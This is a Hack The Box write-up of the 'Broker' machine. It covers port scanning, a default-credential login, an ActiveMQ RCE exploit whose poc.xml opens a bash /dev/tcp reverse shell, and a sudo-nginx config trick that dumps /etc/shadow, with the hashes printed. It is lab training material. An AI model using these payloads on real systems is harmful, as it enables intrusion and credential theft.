#hackthebox #easy #linux #nginx #activemq ![[Pasted image 20250808222306.png]] # Information Gathering - Nmap As always, I started off with scanning all TCP ports. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -Pn -n --open --min-rate 3000 -p- Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-09 01:23 UTC Nmap scan report for 10.10.11.243 Host is up (0.062s latency). Not shown: 65079 closed tcp ports (reset), 447 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1883/tcp open mqtt 5672/tcp open amqp 8161/tcp open patrol-snmp 36441/tcp open unknown 61613/tcp open unknown 61614/tcp open unknown 61616/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 18.30 seconds ``` Then I scanned the open TCP ports again to gather more information. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sCV -p 22,80,1883,5672,8161,36441,61613,61614,61616 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-09 01:24 UTC Nmap scan report for 10.10.11.243 Host is up (0.046s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA) |_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Error 401 Unauthorized | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ basic realm=ActiveMQRealm |_http-server-header: nginx/1.18.0 (Ubuntu) 1883/tcp open mqtt | mqtt-subscribe: | Topics and their most recent payloads: | ActiveMQ/Advisory/MasterBroker: |_ ActiveMQ/Advisory/Consumer/Topic/#: 5672/tcp open amqp? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: | AMQP | AMQP | amqp:decode-error |_ 7Connection from client using unsupported AMQP attempted |_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65 8161/tcp open http Jetty 9.4.39.v20210325 |_http-title: Error 401 Unauthorized | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ basic realm=ActiveMQRealm |_http-server-header: Jetty(9.4.39.v20210325) 36441/tcp open tcpwrapped 61613/tcp open stomp Apache ActiveMQ | fingerprint-strings: | HELP4STOMP: | ERROR | content-type:text/plain | message:Unknown STOMP action: HELP | org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP | org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258) | org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85) | org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83) | org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233) | org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215) |_ java.lang.Thread.run(Thread.java:750) 61614/tcp open http Jetty 9.4.39.v20210325 |_http-title: Site doesn't have a title. |_http-server-header: Jetty(9.4.39.v20210325) | http-methods: |_ Potentially risky methods: TRACE 61616/tcp open apachemq ActiveMQ OpenWire transport 5.15.15 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port5672-TCP:V=7.95%I=7%D=8/9%Time=6896A364%P=x86_64-pc-linux-gnu%r(Get SF:Request,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\x SF:c0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\ SF:0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20clie SF:nt\x20using\x20unsupported\x20AMQP\x20attempted")%r(HTTPOptions,89,"AMQ SF:P\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\ SF:0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02 SF:\xa3\x11amqp:decode-error\xa17Connection\x20from\x20client\x20using\x20 SF:unsupported\x20AMQP\x20attempted")%r(RTSPRequest,89,"AMQP\x03\x01\0\0AM SF:QP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\ SF:x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:de SF:code-error\xa17Connection\x20from\x20client\x20using\x20unsupported\x20 SF:AMQP\x20attempted")%r(RPCCheck,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0 SF:\x19\x02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02 SF:\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Con SF:nection\x20from\x20client\x20using\x20unsupported\x20AMQP\x20attempted" SF:)%r(DNSVersionBindReqTCP,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x SF:02\0\0\0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0 SF:\0S\x18\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connectio SF:n\x20from\x20client\x20using\x20unsupported\x20AMQP\x20attempted")%r(DN SF:SStatusRequestTCP,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\ SF:0\0S\x10\xc0\x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18 SF:\xc0S\x01\0S\x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20fr SF:om\x20client\x20using\x20unsupported\x20AMQP\x20attempted")%r(SSLSessio SF:nReq,89,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\ SF:x0c\x04\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\ SF:x1d\xc0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20client\ SF:x20using\x20unsupported\x20AMQP\x20attempted")%r(TerminalServerCookie,8 SF:9,"AMQP\x03\x01\0\0AMQP\0\x01\0\0\0\0\0\x19\x02\0\0\0\0S\x10\xc0\x0c\x0 SF:4\xa1\0@p\0\x02\0\0`\x7f\xff\0\0\0`\x02\0\0\0\0S\x18\xc0S\x01\0S\x1d\xc SF:0M\x02\xa3\x11amqp:decode-error\xa17Connection\x20from\x20client\x20usi SF:ng\x20unsupported\x20AMQP\x20attempted"); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port61613-TCP:V=7.95%I=7%D=8/9%Time=6896A35F%P=x86_64-pc-linux-gnu%r(HE SF:LP4STOMP,27F,"ERROR\ncontent-type:text/plain\nmessage:Unknown\x20STOMP\ SF:x20action:\x20HELP\n\norg\.apache\.activemq\.transport\.stomp\.Protocol SF:Exception:\x20Unknown\x20STOMP\x20action:\x20HELP\n\tat\x20org\.apache\ SF:.activemq\.transport\.stomp\.ProtocolConverter\.onStompCommand\(Protoco SF:lConverter\.java:258\)\n\tat\x20org\.apache\.activemq\.transport\.stomp SF:\.StompTransportFilter\.onCommand\(StompTransportFilter\.java:85\)\n\ta SF:t\x20org\.apache\.activemq\.transport\.TransportSupport\.doConsume\(Tra SF:nsportSupport\.java:83\)\n\tat\x20org\.apache\.activemq\.transport\.tcp SF:\.TcpTransport\.doRun\(TcpTransport\.java:233\)\n\tat\x20org\.apache\.a SF:ctivemq\.transport\.tcp\.TcpTransport\.run\(TcpTransport\.java:215\)\n\ SF:tat\x20java\.lang\.Thread\.run\(Thread\.java:750\)\n\0\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.70 seconds ``` Lastly, I scanned top 10 UDP ports ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ nmap $IP -sU --top-ports 10 Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-09 01:25 UTC Nmap scan report for 10.10.11.243 Host is up (0.047s latency). PORT STATE SERVICE 53/udp closed domain 67/udp closed dhcps 123/udp closed ntp 135/udp open|filtered msrpc 137/udp closed netbios-ns 138/udp closed netbios-dgm 161/udp closed snmp 445/udp open|filtered microsoft-ds 631/udp closed ipp 1434/udp closed ms-sql-m Nmap done: 1 IP address (1 host up) scanned in 5.10 seconds ``` --- # Enumeration ##### HTTP - TCP 80 As I navigate to the webpage on port 80, it prompts me to enter username and password. ![[Pasted image 20250808202751.png]] I typed in `admin:admin` and it redirected me to the page below. ![[Pasted image 20250808202909.png]] If you click on `Manage ActiveMQ broker`, it navigates you to `/admin`. `Broker` section shows the version. Let's search for any known public exploit or vulnerability available. ![[Pasted image 20250808203057.png]] `searchsploit` reveals a few known vulnerabilities. ![[Pasted image 20250808203313.png]] I also looked up `ActiveMQ vulnerability` on Google and found the following Github repo. ![[Pasted image 20250808212121.png]] I downloaded `exploit.py` and `poc.xml` from the repo. `-h` tag on `exploit.py` kindly tells us what options to use. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ python3 exploit.py -h usage: exploit.py [-h] [-i IP] [-p PORT] [-u URL] options: -h, --help show this help message and exit -i, --ip IP ActiveMQ Server IP or Host -p, --port PORT ActiveMQ Server Port -u, --url URL Spring XML Url ``` Configured `poc.xml` with my IP address and port. ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ cat poc.xml <?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value>bash -i &gt;&amp; /dev/tcp/10.10.14.14/443 0&gt;&amp;1</value> </list> </constructor-arg> </bean> </beans> ``` After few tries, I got a reverse shell! ![[Pasted image 20250808213721.png]] found `user.txt` in `/home/activemq` ```bash activemq@broker:~$ ls user.txt activemq@broker:~$ cat user.txt 776... ``` # Privilege Escalation `sudo -l` reveals that `activemq` user can run `/usr/sbin/nginx` command as `sudo` without password. ```bash activemq@broker:~$ sudsudo -l Matching Defaults entries for activemq on broker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty User activemq may run the following commands on broker: (ALL : ALL) NOPASSWD: /usr/sbin/nginx ``` By supplying your own Nginx config file, you can make it run arbitrary commands as root. - **`user root;`** → Runs Nginx worker processes as the root user. This means any file access will have root privileges. - **`events { worker_connections 1024; }`** → Standard Nginx events block; here it just defines the maximum number of simultaneous connections. - **`http { server { ... } }`** → Defines an HTTP server block. - **`listen 1337;`** → Listens on TCP port 1337. - **`root /;`** → Sets the web root to `/` (the system’s root directory). - **`autoindex on;`** → Enables directory listing when there’s no index file. ```bash user root; events { worker_connections 1024; } http { server { listen 1337; root /; autoindex on; } } ``` run `sudo /usr/sbin/nginx -c /tmp/wook.conf` and it will `nginx` instance as root, serving the entire filesystem over HTTP. ```bash activemq@broker:/tmp$ sudo /usr/sbin/nginx -c /tmp/wook.conf 03:14:27 [11/11] nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error) nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error) nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error) nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error) nginx: [emerg] bind() to 0.0.0.0:1337 failed (98: Unknown error) nginx: [emerg] still could not bind() ``` You can then access `http://$IP:1337/etc/shadow` or any other file that normally requires root permissions! ```bash activemq@broker:/tmp$ curl localhost:1337/etc/shadow root:$y$j9T$S6NkiGlTDU3IUcdBZEjJe0$sSHRUiGL/v4FZkWjU.HZ6cX2vsMY/rdFBTt25LbGxf1:19666:0:99999:7::: daemon:*:19405:0:99999:7::: bin:*:19405:0:99999:7::: sys:*:19405:0:99999:7::: sync:*:19405:0:99999:7::: games:*:19405:0:99999:7::: man:*:19405:0:99999:7::: lp:*:19405:0:99999:7::: mail:*:19405:0:99999:7::: news:*:19405:0:99999:7::: uucp:*:19405:0:99999:7::: proxy:*:19405:0:99999:7::: www-data:*:19405:0:99999:7::: backup:*:19405:0:99999:7::: list:*:19405:0:99999:7::: irc:*:19405:0:99999:7::: gnats:*:19405:0:99999:7::: nobody:*:19405:0:99999:7::: _apt:*:19405:0:99999:7::: systemd-network:*:19405:0:99999:7::: systemd-resolve:*:19405:0:99999:7::: messagebus:*:19405:0:99999:7::: systemd-timesync:*:19405:0:99999:7::: pollinate:*:19405:0:99999:7::: sshd:*:19405:0:99999:7::: syslog:*:19405:0:99999:7::: uuidd:*:19405:0:99999:7::: tcpdump:*:19405:0:99999:7::: tss:*:19405:0:99999:7::: landscape:*:19405:0:99999:7::: fwupd-refresh:*:19405:0:99999:7::: usbmux:*:19474:0:99999:7::: lxd:!:19474:::::: activemq:$y$j9T$5eMce1NhiF0t9/ZVwn39P1$pCfvgXtARGXPYDdn2AVdkCnXDf7YO7He/x666g6qLM5:19666:0:99999:7::: _laurel:!:19667:::::: ``` Got `root.txt` ```bash activemq@broker:/tmp$ curl localhost:1337/root/root.txt b6c... ```